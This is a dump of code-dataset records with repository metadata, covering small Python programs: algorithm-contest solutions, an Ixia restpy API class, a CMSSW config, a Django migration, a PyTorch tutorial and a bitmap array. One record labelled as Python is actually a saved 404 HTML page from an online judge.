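# S3 bucket ARN form):
#   get_bucket_arn("my-bucket")  # -> "arn:aws:s3:::my-bucket"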
| [
"[email protected]"
] | |
7190f1bfb7ef37d25eff124ec59c652fd6d5cdf5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02947/s893966605.py | 67b744e4b961123394465b52cb99e7a525a91c56 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | from collections import defaultdict
from collections import deque
from collections import Counter
import itertools
import math
def readInt():
return int(input())
def readInts():
return list(map(int, input().split()))
def readChar():
return input()
def readChars():
return input().split()
def comb(n,r):
return math.factorial(n)//math.factorial(r)//math.factorial(max(1,n-r))
def con(t):
ans = ""
for i in t:
ans+=i[0]+str(i[1])
return ans
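# Illustrative alternative (not from the submission) to the grouping done
# below: canonicalize each string by sorting its characters, then count
# pairs per group directly:
#   groups = Counter("".join(sorted(s)) for s in strings)  # strings = inputs
#   ans = sum(c * (c - 1) // 2 for c in groups.values())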
n = readInt()
d = defaultdict(int)
for i in [input() for i in range(n)]:
t = defaultdict(int)
for j in i:
t[j]+=1
d[con(sorted(t.items()))]+=1
ans = 0
for i in d:
ans+=comb(d[i],2)
print(ans) | [
"[email protected]"
] | |
6671affb60476364415d4f792368ccdf01def877 | 0a949a1774607543de2dd5edf3a7efbbed3744c5 | /Day 25 power of 2.py | 498bb09544dee2f1fa49029e65f9e1572b050b82 | [] | no_license | AprajitaChhawi/365DaysOfCode.MARCH | ac46631665e508372b3ad6c9d57c89906f657f3d | dc1f70339491eb3ee194c62e1ded28695097d166 | refs/heads/main | 2023-03-28T12:34:56.499942 | 2021-04-01T17:45:22 | 2021-04-01T17:45:22 | 343,509,704 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | #User function Template for python3
class Solution:
##Complete this function
# Function to check if given number n is a power of two.
def isPowerofTwo(self,n):
co=0
while(n>0):
n=n&(n-1)
co=co+1
if(co==1):
return 1
return 0
##Your code here
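        # Note (illustrative equivalence): a positive power of two has
        # exactly one set bit, so the loop above can be replaced by:
        #   return 1 if n > 0 and n & (n - 1) == 0 else 0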
#{
# Driver Code Starts
#Initial Template for Python 3
import math
def main():
T=int(input())
while(T>0):
n=int(input())
ob=Solution()
if ob.isPowerofTwo(n):
print("YES")
else:
print("NO")
T-=1
if __name__=="__main__":
main()
# } Driver Code Ends
| [
"[email protected]"
] | |
9dcec2f68efa859cd5ef76a564687c9193dc6fd4 | 80b7f2a10506f70477d8720e229d7530da2eff5d | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/dhcphostsoptions_191fedb8ef50cd521c12d7ded5cc3bc5.py | 3b4eeaaa7619f809955d955aec4990941c12f30d | [
"MIT"
] | permissive | OpenIxia/ixnetwork_restpy | 00fdc305901aa7e4b26e4000b133655e2d0e346a | c8ecc779421bffbc27c906c1ea51af3756d83398 | refs/heads/master | 2023-08-10T02:21:38.207252 | 2023-07-19T14:14:57 | 2023-07-19T14:14:57 | 174,170,555 | 26 | 16 | MIT | 2023-02-02T07:02:43 | 2019-03-06T15:27:20 | Python | UTF-8 | Python | false | false | 8,259 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
if sys.version_info >= (3, 5):
from typing import List, Any, Union
class DhcpHostsOptions(Base):
"""PortGroup settings placeholder for DHCPHostsPlugin.
The DhcpHostsOptions class encapsulates a list of dhcpHostsOptions resources that are managed by the user.
A list of resources can be retrieved from the server using the DhcpHostsOptions.find() method.
The list can be managed by using the DhcpHostsOptions.add() and DhcpHostsOptions.remove() methods.
"""
__slots__ = ()
_SDM_NAME = "dhcpHostsOptions"
_SDM_ATT_MAP = {
"ObjectId": "objectId",
}
_SDM_ENUM_MAP = {}
def __init__(self, parent, list_op=False):
super(DhcpHostsOptions, self).__init__(parent, list_op)
@property
def ObjectId(self):
# type: () -> str
"""
Returns
-------
- str: Unique identifier for this object
"""
return self._get_attribute(self._SDM_ATT_MAP["ObjectId"])
def add(self):
"""Adds a new dhcpHostsOptions resource on the server and adds it to the container.
Returns
-------
- self: This instance with all currently retrieved dhcpHostsOptions resources using find and the newly added dhcpHostsOptions resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained dhcpHostsOptions resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ObjectId=None):
# type: (str) -> DhcpHostsOptions
"""Finds and retrieves dhcpHostsOptions resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve dhcpHostsOptions resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all dhcpHostsOptions resources from the server.
Args
----
- ObjectId (str): Unique identifier for this object
Returns
-------
- self: This instance with matching dhcpHostsOptions resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of dhcpHostsOptions data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the dhcpHostsOptions resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def CustomProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the customProtocolStack operation on the server.
Create custom protocol stack under /vport/protocolStack
customProtocolStack(Arg2=list, Arg3=enum, async_operation=bool)
---------------------------------------------------------------
- Arg2 (list(str)): List of plugin types to be added in the new custom stack
- Arg3 (str(kAppend | kMerge | kOverwrite)): Append, merge or overwrite existing protocol stack
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = {"Arg1": self}
for i in range(len(args)):
payload["Arg%s" % (i + 2)] = args[i]
for item in kwargs.items():
payload[item[0]] = item[1]
return self._execute(
"customProtocolStack", payload=payload, response_object=None
)
def DisableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the disableProtocolStack operation on the server.
Disable a protocol under protocolStack using the class name
disableProtocolStack(Arg2=string, async_operation=bool)string
-------------------------------------------------------------
- Arg2 (str): Protocol class name to disable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = {"Arg1": self.href}
for i in range(len(args)):
payload["Arg%s" % (i + 2)] = args[i]
for item in kwargs.items():
payload[item[0]] = item[1]
return self._execute(
"disableProtocolStack", payload=payload, response_object=None
)
def EnableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the enableProtocolStack operation on the server.
Enable a protocol under protocolStack using the class name
enableProtocolStack(Arg2=string, async_operation=bool)string
------------------------------------------------------------
- Arg2 (str): Protocol class name to enable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = {"Arg1": self.href}
for i in range(len(args)):
payload["Arg%s" % (i + 2)] = args[i]
for item in kwargs.items():
payload[item[0]] = item[1]
return self._execute(
"enableProtocolStack", payload=payload, response_object=None
)
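# Usage sketch (assumption: an active ixnetwork_restpy session; the exact
# parent accessor path is illustrative, not confirmed by this file):
#   opts = protocol_stack.DhcpHostsOptions.find()
#   print(opts[0].ObjectId)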
| [
"[email protected]"
] | |
d3fecc8b89dd54cd773450d6b1f0371b7586260a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/55/usersdata/67/23126/submittedfiles/av2_p3_civil.py | 021be36901210757e4d1cd358ae7703c7b0c0ed6 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
n=input("Digite a dimensão da matriz:")
pdp=input("Digite a posição a qual deseja pesar o valor da peça:")
linha=n
coluna=n
a=np.zeros((linha,coluna))
for i in range (0,a.shape[0],1):
for j in range (0,a.shape[1],1):
a[i,j]=input("Digite um elemento para a matriz:")
print a
| [
"[email protected]"
] | |
3edb99208215975625109feab3b281a6d20663b2 | c2fef17ef7644316da7f1f1d3819f67a4cdb21cb | /python/L1TCSCTF_cfi.py | 444847f551d3ae500d20283e9f2b8119607e6a63 | [] | no_license | rjwang/CSCTFDQM | cde5e937c3029a8309c189b20ad8253ff4e16df6 | 3dc419fad4f2cbf1b0cd1d4fb172a175f26d7025 | refs/heads/master | 2016-09-15T13:59:42.321400 | 2014-11-17T12:15:38 | 2014-11-17T12:15:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | import FWCore.ParameterSet.Config as cms
l1tCsctf = cms.EDAnalyzer("L1TCSCTF",
#gmtProducer = cms.InputTag("gtDigis"),
gmtProducer = cms.InputTag("null"),
statusProducer = cms.InputTag("csctfDigis"),
outputFile = cms.untracked.string(''),
lctProducer = cms.InputTag("csctfDigis"),
verbose = cms.untracked.bool(False),
gangedME11a = cms.untracked.bool(True),
trackProducer = cms.InputTag("csctfDigis"),
mbProducer = cms.InputTag("csctfDigis:DT"),
DQMStore = cms.untracked.bool(True),
disableROOToutput = cms.untracked.bool(True)
)
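# Usage sketch (illustrative): in a CMSSW configuration this module is
# attached to the process, optionally cloned with overrides, e.g.
#   process.l1tCsctf = l1tCsctf.clone(verbose = cms.untracked.bool(True))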
| [
"[email protected]"
] | |
a4479a3d1bc8e0e338b8104a625f384ee5214c0c | 47c39800fa6f928e0d13f26727ba52bda2aa6ff0 | /One/migrations/0013_knowledgemediastore_m_k_ip.py | 3c2b40b750f7a0ed28e290d0e62cc7022e06c04f | [
"MIT"
] | permissive | dddluke/zhihuipingtai | 952ed5f9a4011cb4fb2765a0571c978af784d708 | 4e46e01440f8c270c05259ac0f38bd56dd04016c | refs/heads/master | 2023-03-09T03:32:47.807760 | 2021-02-26T02:36:10 | 2021-02-26T02:36:10 | 341,816,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | # Generated by Django 3.1.2 on 2020-10-13 08:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('One', '0012_solution_s_user_name'),
]
operations = [
migrations.AddField(
model_name='knowledgemediastore',
name='m_k_ip',
field=models.CharField(max_length=40, null=True),
),
]
| [
"[email protected]"
] | |
c6c98662e4fa436e5465b70a23c3c113752a5975 | 1b287461e9bb550b96c1e2eff7e6c716ab7d536e | /pytorch/neuralNetwork.py | 5ee68b460804d9842c9aa3027d8dfb849cc9aadf | [] | no_license | TQCAI/python-study-notebook | 64b9c7bfaa6c47ef2d783aa2a36ba914d13b9db2 | e0a9eee556c3da7441e5be6ee4baf16f1ae075a9 | refs/heads/master | 2020-05-18T19:28:27.998087 | 2019-05-04T10:29:10 | 2019-05-04T10:29:10 | 184,609,373 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,820 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# 1 input image channel, 6 output channels, 5x5 square convolution
# kernel
self.conv1 = nn.Conv2d(1, 6, 5)
self.conv2 = nn.Conv2d(6, 16, 5)
# an affine operation: y = Wx + b
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# Max pooling over a (2, 2) window
x = F.max_pool2d(F.relu(self.conv1(x)), 2)
# If the size is a square you can only specify a single number
x = F.max_pool2d(F.relu(self.conv2(x)), 2)
        # reshape the matrix into a vector
x = x.view(-1, self.num_flat_features(x))
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
net = Net()
print(net)
params = list(net.parameters())
print(len(params))
print(type(params[0]))
input = torch.randn(1, 1, 32, 32)
out = net(input)
print(out)
net.zero_grad()
out.backward(torch.randn(1, 10))
output = net(input)
target = torch.randn(10) # a dummy target, for example
target = target.view(1, -1) # make it the same shape as output
criterion = nn.MSELoss()
loss = criterion(output, target)
print(loss)
print(loss.grad_fn)
net.zero_grad() # zeroes the gradient buffers of all parameters
loss.backward()
print('conv1.bias.grad after backward')
print(net.conv1.bias.grad)
learning_rate = 0.01
for f in net.parameters():
    f.data.sub_(f.grad.data * learning_rate)
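# Idiomatic alternative (a sketch, not part of the original tutorial code):
# torch.optim applies the same SGD update without mutating parameters by hand.
import torch.optim as optim
optimizer = optim.SGD(net.parameters(), lr=learning_rate)
optimizer.zero_grad()   # clear the gradients accumulated above
loss = criterion(net(input), target)
loss.backward()         # compute fresh gradients for this forward pass
optimizer.step()        # apply the update: p <- p - lr * p.grad
 | [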
"[email protected]"
] | |
6ecdc9780c6cd6e6fa0b22b17660a4e8a3cd2d8a | 8015f1c62a2cb4efd21aa8938336913bf8117868 | /bamap/ba3689.pngMap.py | 4333c396bc7970c3323a63989426ae8f56f57b9d | [] | no_license | GamerNoTitle/Beepers-and-OLED | 675b5e3c179df0f0e27b42bf594c43860d03b9af | afe1340e5394ae96bda5f9022a8a66824368091e | refs/heads/master | 2020-04-20T00:09:47.122471 | 2019-04-29T04:59:35 | 2019-04-29T04:59:35 | 168,515,579 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,468 | py | ba3689.pngMap = [
'11111111111111111111111111111111111111111111111111111111111111000000111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111000000111111111111111111111111111111111111111111111111111111111111',
'11111111111111111100001111111111110001011111111111111111111111100110111111111111111111111111111111111111111111111111111111111110',
'11111111111111111011101011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111001111111111111111111111111111111110000111111111111111111111111111111111111111111111111111111111111111111111111',
'11011111111111111001111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111111111111111',
'01001111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'01001111111111111110111111111111111111011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'10111111111111111111111111111111111111111111111111111111111110111111111111111111111111111111111111111111111111111111111111111111',
'11111111100001111111111111111111111111111111111111111111110001001111111111111111111111111111111111111111111111111111111111111111',
'11111111110011111111111111111111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111110',
'11111111111001111111111111111111111111111111111111111111111111001111111111111111111111111111111111111111111111111111111111111110',
'11111111111111111111111111111111111111111111111111111111111000001111111111111111111111111111111111111111111111111111111111111110',
'11111111111111111111111111111111111111111111111111111111100000000111111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111111000000000000111111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111111110000000000000011111111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111100000001001111111111100000000000000001111111111111111111111111111111111111001111111111111111111',
'11100111111111111111111111111111111111111111111111110100000000000000000111111111111111111111111111111111111111111111111111111111',
'11101111111111111111111111111111111111111111111111100000000000000000001111111111111111111111111111111111111111111111111111111111',
'11111100111111111111111111111111111111111111111111100000000000000000001111111111111111111111111111110111111111111111111111111111',
'11111111111111111111111111111111111111111111111100000000000000000001111111010100000000000000111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111100000000000000000000111010000000000000000001011111111111111111111111111111111111',
'11111111111111111111111111111111111111111111111000000000000000000100000000000000000000000000001111111111111111111111111111111111',
'11111111111111111111111111111111111111111111101100000000000000000000000000000000000000000000000011111111111111111111111111111111',
'11111111111111111111111111111111111111111111001100000000000000000000000000000000000000000000000000111111111111111111111111111111',
'11111111111111111111111111111111111111111110011111000000000000000000000000000000000000000000000000111111111111111111111111111111',
'11111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000011111111111111111111111111',
'11111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000011111111111111111111111111',
'11111111111111111111111111111001111111111111111111110000000000000000000000000000000000000000000000000011110011111111111111111111',
'11111111111111111111111111111101111111111111111111111100000000000000000000000000000000000000000000000111110011111111111111111111',
'11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000011111111111111111111111111',
'11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000010001111111111111111111111',
'11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000001001111111111111111111111',
'11111111111111111111111111111111111111111111111111111000000000000000000000000000000000000000000000000001101111111111111111111111',
'11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000101111111111111111111111',
'11111111111111111111111111111111111111111111111111111000000000000000010000000000000000000000000000000000101111111111111111111111',
'11111111111111111111001111111111111111111111111111100000000000000000000000000000000000000000000000000000111111111111111111111111',
'11111111111111111111001111111111111111111111111111111100000000000000010000000000000000000000000000000000111111111111111111111111',
'11111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000001101111111111111111111111',
'11111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000011101111111111111111111111',
'11111111111111111111111111111111111111111111111111111111000000000000000000100000000000000000000000000000111111100011111111111111',
'11111111111111111111111111111111111111111111111111111100000000000000000000000000000000000000000000000000111111100011111111111111',
'11111111111111111111111111111111111111111111111111110100000000000000000000000011000000000000000000001011111111100001111111111111',
'11111111111111111111111111111111011111111111111111110000000000000000000011000011100000000000000000001111111111100011111111111111',
'11000011111111111111111111111111001111111111111111000000000000000000000000001011010011000000000010111111111111101111111111111111',
'11111111111111111111111111111111001111111111111110000000000000000000000000000011111111110000111111111111111111111111111111111111',
'11111111111111111111111111111111111111111111001000000000000000000000000011111111111111111111111111111111111111111111111111111110',
'11111011111111111111111111111111111111111111001000000000000000000000000011111111111111111111111111111111111111111111111111111111',
'10000111111111111111111111111111111111111100000000000000000000000000000001111111111111111111111111111111111111111111111111111111',
'11011111111111111111111111111111111111111100000000000000000000000000000011111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111100000000000000000000000000000000000011111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000000000000000000000000000000001111111111111111111111111111111111111111011111111111111',
'11111111111111111111111111111111000000000000000000000000000000000000000000111111111111111111111111111111111110000101111111111111',
'11111111111111111111111111111111000000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111100000000000000000000000000000000000000000000111111111111111111111111111111111110000001111111111111',
'11111111111111111111111111111110000000000000000000000000000000000000000000111111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111110000000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111000000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000000000000000000000000000000000101111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111110000000000000000000000000000000000000000001111111111111111111111111111111111111111111111111111',
'11111111111111111111111111111111111110000000000000000000000000000000000000001111111111111111111111111111111111110000000111111111',
'11111111111111111111111111111111111111100000000000000000000000000000000000011111111111111111111111111111111111111001111111111111',
]
| [
"[email protected]"
] | |
be374b162f988d88dda2b249e3f6c373e8addd04 | 0529196c4d0f8ac25afa8d657413d4fc1e6dd241 | /runnie0427/10868/10868.py3.py | d822d78334509fa88d0777cfd0db8f9b9b10472d | [] | no_license | riyuna/boj | af9e1054737816ec64cbef5df4927c749808d04e | 06420dd38d4ac8e7faa9e26172b30c9a3d4e7f91 | refs/heads/master | 2023-03-17T17:47:37.198570 | 2021-03-09T06:11:41 | 2021-03-09T06:11:41 | 345,656,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,372 | py | <!DOCTYPE html>
<html lang="ko">
<head>
<title>Baekjoon Online Judge</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta charset="utf-8"><meta name="author" content="스타트링크 (Startlink)"><meta name="keywords" content="ACM-ICPC, ICPC, 프로그래밍, 온라인 저지, 정보올림피아드, 코딩, 알고리즘, 대회, 올림피아드, 자료구조"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta property="og:type" content="website"><meta property="og:image" content="http://onlinejudgeimages.s3-ap-northeast-1.amazonaws.com/images/boj-og-1200.png"><meta property="og:site_name" content="Baekjoon Online Judge"><meta name="format-detection" content = "telephone=no"><meta name="msapplication-config" content="none"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="manifest" href="/site.webmanifest"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#0076c0"><meta name="msapplication-TileColor" content="#00aba9"><meta name="theme-color" content="#ffffff"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.2.0/css/bootstrap.min.css"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/style.css?version=20210107"><link href="https://fonts.googleapis.com/css?family=Noto+Sans+KR:400,700|Open+Sans:400,400i,700,700i|Source+Code+Pro&subset=korean" rel="stylesheet"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/connect.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/result.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/custom.css?version=20210107"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.css"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/theme-colors/blue.css?version=20210107"><link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/css/pace.css">
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-10874097-3"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-10874097-3');
</script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.css" /><meta name="username" content="">
<link rel="stylesheet" href="https://ddo7jzca0m2vt.cloudfront.net/unify/css/pages/page_404_error.css">
</head>
<body>
<div class="wrapper">
<div class="header no-print"><div class="topbar"><div class="container"><ul class="loginbar pull-right"><li><a href = "/register">회원가입</a></li><li class="topbar-devider"></li><li><a href = "/login?next=%2Fsource%2Fdownload%2F16222671">로그인</a></li></ul></div></div><div class="navbar navbar-default mega-menu" role="navigation"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-responsive-collapse"><span class="sr-only">Toggle navigation</span><span class="fa fa-bars"></span></button><a class="navbar-brand" href="/"><img id="logo-header" src="https://d2gd6pc034wcta.cloudfront.net/images/[email protected]" alt="Logo" data-retina></a></div><div class="collapse navbar-collapse navbar-responsive-collapse"><ul class="nav navbar-nav"><li class="dropdown mega-menu-fullwidth "><a href="javascript:void(0);" class="dropdown-toggle" data-toggle="dropdown">문제</a><ul class="dropdown-menu"><li><div class="mega-menu-content"><div class="container"><div class="row equal-height"><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>문제</h3></li><li><a href = "/problemset">전체 문제</a></li><li><a href = "/category">문제 출처</a></li><li><a href = "/step">단계별로 풀어보기</a></li><li><a href = "/problem/tags">알고리즘 분류</a></li><li><a href = "/problem/added">새로 추가된 문제</a></li><li><a href = "/problem/added/1">새로 추가된 영어 문제</a></li><li><a href = "/problem/ranking">문제 순위</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>문제</h3></li><li><a href="/problem/only">푼 사람이 한 명인 문제</a></li><li><a href="/problem/nobody">아무도 못 푼 문제</a></li><li><a href="/problem/recent/submit">최근 제출된 문제</a></li><li><a href="/problem/recent/accepted">최근 풀린 문제</a></li><li><a href="/problem/random">랜덤</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>출처</h3></li><li><a href = "/category/1">ICPC</a></li><li><a href = "/category/2">Olympiad</a></li><li><a href = "/category/55">한국정보올림피아드</a></li><li><a href = "/category/57">한국정보올림피아드시․도지역본선</a></li><li><a href = "/category/318">전국 대학생 프로그래밍 대회 동아리 연합</a></li><li><a href = "/category/5">대학교 대회</a></li><li><a href = "/category/428">카카오 코드 페스티벌</a></li><li><a href = "/category/215">Coder's High</a></li></ul></div><div class="col-md-3 equal-height-in"><ul class="list-unstyled equal-height-list"><li><h3>ICPC</h3></li><li><a href = "/category/7">Regionals</a></li><li><a href = "/category/4">World Finals</a></li><li><a href = "/category/211">Korea Regional</a></li><li><a href = "/category/34">Africa and the Middle East Regionals</a></li><li><a href = "/category/10">Europe Regionals</a></li><li><a href = "/category/103">Latin America Regionals</a></li><li><a href = "/category/8">North America Regionals</a></li><li><a href = "/category/92">South Pacific Regionals</a></li></ul></div></div></div></div></li></ul></li><li><a href = "/workbook/top">문제집</a></li><li><a href = "/contest/official/list">대회<span class='badge badge-red rounded-2x'>2</span></a></li><li><a href = "/status">채점 현황</a></li><li><a href = "/ranklist">랭킹</a></li><li><a href = "/board/list/all">게시판</a></li><li><a href = "/group/list/all">그룹</a></li><li><a href = "/blog/list">블로그</a></li><li><a href = "/lectures">강의</a></li><li><a href = "/search"><i class="fa fa-search search-btn"></i></a></li></ul></div></div></div></div><form action="/logout" method="post" id="logout_form"><input type='hidden' 
value='%2Fsource%2Fdownload%2F16222671' name="next"></form>
<div class="container content">
<div class="col-md-8 col-md-offset-2">
<div class="error-v1">
<span class="error-v1-title">404</span>
<span>Not found</span>
<div class="margin-bottom-20"></div>
</div>
<div class="text-center">
<span style="font-size:18px;">강의 슬라이드의 첨부 소스 코드가 404 에러가 뜨는 경우에는 링크를 복사/붙여넣기 해주세요.</span>
</div>
<div class="margin-bottom-40"></div>
</div>
</div>
<div class="footer-v3 no-print"><div class="footer"><div class="container"><div class="row"><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>Baekjoon Online Judge</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/about">소개</a></li><li><a href="/news">뉴스</a></li><li><a href="/live">생중계</a></li><li><a href="/poll">설문조사</a></li><li><a href="/blog">블로그</a></li><li><a href="/calendar">캘린더</a></li><li><a href="/donate">기부하기</a></li><li><a href="https://github.com/Startlink/BOJ-Feature-Request">기능 추가 요청</a></li><li><a href="https://github.com/Startlink/BOJ-spj">스페셜 저지 제작</a></li><li><a href="/labs">실험실</a></li></ul><div class="thumb-headline"><h2>채점 현황</h2></div><ul class="list-unstyled simple-list"><li><a href="/status">채점 현황</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>문제</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/problemset">문제</a></li><li><a href="/step">단계별로 풀어보기</a></li><li><a href="/problem/tags">알고리즘 분류</a></li><li><a href="/problem/added">새로 추가된 문제</a></li><li><a href="/problem/added/1">새로 추가된 영어 문제</a></li><li><a href="/problem/ranking">문제 순위</a></li><li><a href="/problem/recent/submit">최근 제출된 문제</a></li><li><a href="/problem/recent/accepted">최근 풀린 문제</a></li><li><a href="/change">재채점 및 문제 수정</a></li></ul><div class="thumb-headline"><h2>유저 대회 / 고등학교 대회</h2></div><ul class="list-inline simple-list margin-bottom"><li><a href="/category/353">FunctionCup</a></li><li><a href="/category/319">kriiicon</a></li><li><a 